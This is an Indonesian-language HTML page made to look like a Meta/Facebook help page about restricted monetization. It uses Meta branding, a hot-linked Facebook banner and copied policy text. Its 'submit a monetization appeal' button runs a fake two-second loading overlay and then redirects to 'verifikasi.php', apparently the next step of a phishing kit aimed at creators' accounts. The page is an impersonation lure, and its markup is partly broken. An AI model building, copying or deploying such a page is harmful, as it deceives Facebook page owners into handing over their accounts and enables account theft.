
<!DOCTYPE html>
<html lang="id">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Mengatasi Monetisasi Terdampak</title>
  <link rel="icon" href="img/logometa.png">
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f4f4f4;
    }

    .container {
      max-width: 400px;
      margin: 20px auto;
      background-color: #fff;
      border-radius: 10px;
      overflow: hidden;
      box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
    }

    .header {
      background-color: #e3e3e3;
      padding: 10px 20px;
      display: flex;
      justify-content: space-between;
      align-items: center;
    }

    .header img {
      height: 20px; /* Atur tinggi logo */
      width: auto; /* Menjaga proporsi logo */
    }

    .header a {
      text-decoration: none;
    }

    .header button {
      background-color: #007aff;
      color: white;
      border: none;
      border-radius: 5px;
      padding: 5px 10px;
      font-size: 12px;
      cursor: pointer;
      transition: background-color 0.3s;
    }

    .header button:hover {
      background-color: #005bb5;
    }

    .content {
      padding: 20px;
    }

    .content img {
      width: 100%; /* Membuat gambar memenuhi lebar container */
      height: auto; /* Menjaga proporsi gambar */
      display: block;
      margin-bottom: 20px;
    }

    .content h2 {
      font-size: 18px;
      color: #333;
      margin-bottom: 10px;
    }

    .content p {
      font-size: 14px;
      color: #666;
      line-height: 1.6;
      margin-bottom: 20px;
    }

    .section {
      margin-bottom: 20px;
    }

    .section h3 {
      font-size: 16px;
      color: #333;
      margin-bottom: 10px;
    }

    .section p {
      font-size: 14px;
      color: #666;
      line-height: 1.5;
      margin-bottom: 10px;
    }

    .link {
      text-align: center;
      margin-top: 20px;
    }

    .link a {
      color: #007aff;
      text-decoration: none;
      font-size: 14px;
      font-weight: bold;
    }

    .link a:hover {
      text-decoration: underline;
    }
    
    button-container {
      margin-top: 20px;
    }

    .button {
      display: block;
      background-color: #007bff; /* Warna biru */
      color: white; /* Warna teks */
      text-align: center;
      text-decoration: none;
      font-size: 16px;
      padding: 12px 0; /* Membuat tombol lebih tinggi */
      border-radius: 30px; /* Membuat sudut oval */
      box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); /* Bayangan tombol */
      cursor: pointer;
      transition: background-color 0.3s ease;
      width: 100%; /* Memanjang penuh */
    }

    .button:hover {
      background-color: #0056b3; /* Warna biru lebih gelap saat hover */
    }
    
    /* Overlay Loading */
    .overlay {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.5); /* Warna overlay */
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 1000;
      display: none; /* Tersembunyi secara default */
    }

    .spinner {
      border: 4px solid #f3f3f3; /* Warna latar belakang spinner */
      border-top: 4px solid #007bff; /* Warna utama spinner */
      border-radius: 50%;
      width: 40px;
      height: 40px;
      animation: spin 1s linear infinite;
    }

    @keyframes spin {
      0% {
        transform: rotate(0deg);
      }
      100% {
        transform: rotate(360deg);
      }
    }
    
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f5f6f7;
        }

        header {
            background-color: #ffffff;
            padding: 20px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
        }

        header h1 {
            font-size: 24px;
            color: #1877f2;
            margin: 0;
        }

        .hero-section {
            background-color: #0056b3;
            color: white;
            text-align: center;
            padding: 50px 20px;
        }

        .hero-section h2 {
            font-size: 36px;
            margin: 0 0 20px;
        }

        .hero-section button {
            padding: 10px 20px;
            margin: 5px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }

        .button-primary {
            background-color: #1877f2;
            color: white;
        }

        .button-secondary {
            background-color: transparent;
            color: white;
            border: 1px solid white;
        }

        .faq-section {
            padding: 20px;
            background-color: #ffffff;
        }

        .faq-section h3 {
            font-size: 20px;
            margin-bottom: 20px;
            color: #333;
        }

        .faq-item {
            margin-bottom: 15px;
        }

        .faq-item button {
            width: 100%;
            text-align: left;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 5px;
            background-color: #f9f9f9;
            font-size: 16px;
            cursor: pointer;
        }

        .faq-item button:hover {
            background-color: #f0f0f0;
        }

        footer {
            background-color: #333;
            color: white;
            text-align: center;
            padding: 20px;
        }

        footer p {
            margin: 0;
            font-size: 14px;
        }
    
    
  </style>
</head>
<body>
  <div class="container">
    <div class="header">
      <!-- Gambar logo di header -->
      <img src="img/logometa.png" width="100%" alt="Logo Rekomendasi">
      <!-- Tombol sebagai tautan -->
      
        
      </a>
    </div>
    <div class="content">
      <img src="https://about.fb.com/wp-content/uploads/2021/12/NRP-Expanding-Facebook-Protect-to-the-World_Header.jpg" alt="Gambar Banner">
       <div class="button-container">
           <!-- Overlay Loading -->
  <div class="overlay" id="loadingOverlay">
    <div class="spinner"></div>
  </div>
        <a href="#" class="button" onclick="showLoading(event, 'verifikasi.php')">Ajukan Banding Monetisasi</a>
      </div>
      <p>
      <h2>Kebijakan Monetisasi Konten</h2></p>
      
        
          Kami menawarkan fitur dan produk yang membantu kreator dan penerbit menghasilkan uang dari kontennya. Konten ini harus mematuhi aturan tertentu.</p>

</p>Semua konten di Facebook harus mematuhi Ketentuan Layanan dan Standar Komunitas kami. Ini adalah aturan tingkat tinggi kami yang melarang konten seksual, kekerasan, tidak sopan, dan mengandung kebencian. Namun, konten yang sesuai untuk Facebook pada umumnya tidak selalu sesuai untuk dimonetisasi.

</p>Kreator dan penerbit harus mematuhi Kebijakan Monetisasi Mitra dan Kebijakan Monetisasi Konten agar bisa menghasilkan uang dari konten mereka. Anda bisa mempelajari selengkapnya tentang Kebijakan Monetisasi Mitra di bagian "Pelajari selengkapnya" di bawah ini.

</p>Konten itu sendiri harus mengikuti pedoman ini agar memenuhi syarat untuk produk monetisasi tertentu..</p></b>


        <h2>Format yang dilarang
Konten yang disajikan dalam format berikut tidak bisa dimonetisasi:
</h2><ul>
    <li>Konten yang berisi satu gambar statis dan sedikit atau tanpa gerakan.</li>
    <li>Konten yang diposting hanya untuk meningkatkan interaksi dengan meminta orang menanggapi pertanyaan yang ditampilkan konten.</li>
    <li>Konten yang utamanya menampilkan gambar-gambar diam yang diputar berurutan.</li>
    <li>Konten yang berulang dan menampilkan segmen yang sama beberapa kali. Konten berulang bisa meliputi GIF dan konten dengan berbagai durasi.</li>
    <li>Konten yang utamanya menampilkan gambar diam atau bergerak dengan lapisan teks.</li>
    <li>Konten yang telah menyertakan iklan sebelum pemutaran konten, di tengah pemutaran konten, setelah pemutaran konten, atau iklan banner sematan tempat Facebook menawarkan penempatan iklan. Misalnya, video yang menyertakan iklan di tengah pemutaran konten yang disisipkan secara manual tidak memenuhi syarat untuk Iklan In-Stream.</li>
</ul>
        
      </div>
      
      <div class="section">
        <h2>Perilaku berikut tidak bisa dimonetisasi:</h2><ul>
            <li>Konten yang memancing orang untuk mengklik tautan atau menanggapi postingan melalui suka, komentar, atau bagikan.</li>
            <li>Konten yang meminta kompensasi sebagai ganti perilaku yang ekstrem.</li>
        </ul>
      </div>
      <div class="section">
        <h2>Konten yang menggambarkan atau membahas subjek dalam kategori berikut bisa mengalami pengurangan atau pembatasan monetisasi:</h2>
        <ul>
            <li>Kami mendefinisikan "isu sosial yang diperdebatkan" sebagai "isu sosial yang bisa memicu perdebatan, seperti hak pribadi, sipil, atau politik". Konten bisa mengalami pengurangan atau penonaktifan monetisasi jika menggambarkan atau membahas subjek berikut dengan cara memecah belah atau menghina.</li>
            <li>Konten yang mengeksploitasi isu politik atau sosial yang penuh kontroversi untuk tujuan komersial tidak boleh dimonetisasi.</li>
            <li>Kami mendefinisikan "tragedi atau konflik" sebagai "tekanan fisik atau emosional, seperti kematian, cedera, pelecehan, penyakit, atau peristiwa yang merusak". Penggambaran atau pembahasan masalah ini, baik nyata atau fiksi, bisa memengaruhi monetisasi konten Anda.</li>
            <li>Kami mendefinisikan "aktivitas yang tidak pantas" sebagai penggunaan atau penyalahgunaan zat terlarang, atau kejahatan". Penggambaran atau pembahasan masalah ini, baik nyata atau fiksi, bisa memengaruhi monetisasi konten Anda.</li>
            <li>Kami melarang monetisasi konten yang mempromosikan penjualan atau penyalahgunaan obat-obatan ilegal, obat dengan resep dokter, atau narkotika.</li>
            <li>Kami mendefinisikan konten yang bersifat "seksual atau vulgar” dalam contoh di bawah ini. Konten bisa mengalami pengurangan atau penonaktifan monetisasi jika memuat konten ini. Penggambaran atau pembahasan masalah ini, baik nyata atau fiksi, bisa memengaruhi monetisasi konten Anda.</li>
            <li>Kami melarang monetisasi konten yang memuat ketelanjangan, menggambarkan orang secara tidak senonoh, atau aktivitas yang sangat vulgar atau mengundang pikiran tidak senonoh.</li>
            <li>Kami mendefinisikan "bahasa kasar" sebagai "kata-kata kotor, merendahkan, atau bahasa seksual vulgar". Konten mungkin mengalami penurunan atau penonaktifan monetisasi jika berisi bahasa semacam ini, baik lisan, tertulis, atau pun disampaikan dengan cara lain.</li>
            <li>Kami mendefinisikan "konten vulgar" sebagai "cedera, konten sadis, atau fungsi atau kondisi tubuh". Konten mungkin tidak bisa dimonetisasi jika menampilkan atau membahas kondisi sadis atau fisik. Penggambaran subjek ini, baik nyata atau fiksi, bisa memengaruhi monetisasi konten Anda.</li>
            
        </ul>
        
      </div>
      <div class="section">
        <h2>Pelajari selengkapnya</h2>
        <ul>
            <li>Tentang Kebijakan Monetisasi Mitra</li>
            <li>tentang Demonetisasi Video</li>
            <li>Memeriksa kelayakan monetisasi Halaman Anda</li>
            <li>lainnya</li>
        </ul>
        
      </div>
      
      <div class="link">
        <a href="#">Pelajari selengkapnya tentang pedoman rekomendasi di Pusat Bantuan</a>
      </div>
    </div>
  </div>
  <script>
    function showLoading(event, url) {
      event.preventDefault(); // Mencegah link langsung terbuka
      const overlay = document.getElementById('loadingOverlay');
      overlay.style.display = 'flex'; // Menampilkan overlay

      // Redirect setelah 2 detik (simulasi loading)
      setTimeout(() => {
        window.location.href = url;
      }, 2000);
    }
  </script>
</body>
</html>
